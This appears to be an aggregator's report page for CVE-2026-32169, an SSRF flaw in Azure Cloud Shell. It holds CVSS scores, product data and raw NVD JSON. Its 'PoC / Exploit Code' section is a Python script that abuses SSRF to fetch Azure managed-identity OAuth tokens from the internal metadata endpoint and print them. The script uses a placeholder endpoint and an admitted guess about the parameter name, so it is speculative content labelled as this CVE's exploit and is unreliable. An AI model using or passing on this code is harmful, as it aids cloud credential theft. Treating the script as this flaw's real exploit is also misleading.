Security Vulnerability Report
中文
CVE-2026-32169 CVSS 10.0 CRITICAL

CVE-2026-32169

Published: 2026-03-19 21:17:10
Last Modified: 2026-04-14 17:14:41

Description

Server-side request forgery (ssrf) in Azure Cloud Shell allows an unauthorized attacker to elevate privileges over a network.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:azure_cloud_shell:-:*:*:*:*:*:*:* - VULNERABLE
版本信息未明确披露

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the vulnerable Azure Cloud Shell endpoint target_url = "https://shell.azure.com/api/vulnerable_endpoint" # Internal metadata endpoint to access (IMDS) # Attacker aims to retrieve access tokens via SSRF internal_payload = "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" # Headers required for the IMDS request headers = { "Metadata": "true" } # Construct the malicious request exploiting SSRF # Assuming the vulnerable endpoint takes a 'url' parameter exploit_data = { "url": internal_payload } try: # Send the SSRF request response = requests.post(target_url, data=exploit_data, headers=headers) # Check if the exploit was successful if response.status_code == 200: print("SSRF Exploit Successful!") print("Leaked Metadata/Token:") print(response.text) else: print(f"Exploit failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32169", "sourceIdentifier": "[email protected]", "published": "2026-03-19T21:17:10.233", "lastModified": "2026-04-14T17:14:41.383", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Server-side request forgery (ssrf) in Azure Cloud Shell allows an unauthorized attacker to elevate privileges over a network."}, {"lang": "es", "value": "Falsificación de petición del lado del servidor (SSRF) en Azure Cloud Shell permite a un atacante no autorizado elevar privilegios sobre una red."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:azure_cloud_shell:-:*:*:*:*:*:*:*", "matchCriteriaId": "37711447-A959-4A77-B367-99BD19AC726A"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32169", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}